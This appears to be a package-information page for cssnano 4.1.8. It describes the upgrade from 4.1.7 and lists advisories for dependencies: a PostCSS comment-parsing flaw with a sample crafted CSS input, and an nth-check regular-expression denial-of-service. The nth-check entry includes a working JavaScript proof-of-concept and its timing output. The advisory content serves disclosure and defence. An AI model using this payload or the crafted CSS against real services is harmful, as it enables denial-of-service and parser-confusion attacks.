Cssnano is a powerful tool for minifying CSS, built upon the PostCSS ecosystem, enabling developers to optimize their stylesheets for production. Version 4.1.8 brings subtle but important enhancements over its predecessor, 4.1.7, mainly visible on the dependencies. The key update lies in the dependency cssnano-preset-default, which moved from version 4.0.5 to 4.0.6. This preset encapsulates the default set of optimizations cssnano applies, so developers should expect potentially different and improved minification results compared to the previous version. While the core dependencies like postcss and cosmiconfig remain consistent, the change in the preset indicates refinements in the default minification strategy. While the unpacked data size slightly decreased from 28196 to 28053, this is negligible and should not reflect on usage.
For developers considering an upgrade, this means reviewing how the new default preset impacts their CSS. Although the update is minor, the enhancements of the updated default preset can reduce CSS sizes, improving website performance. Consider testing the new version on a staging environment to ensure its compatibility with any existing styling and processes. Essentially, version 4.1.8 offers developers a refined and potentially even more efficient way to optimize their CSS stylesheets for production environments.
All the vulnerabilities related to the version 4.1.8 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms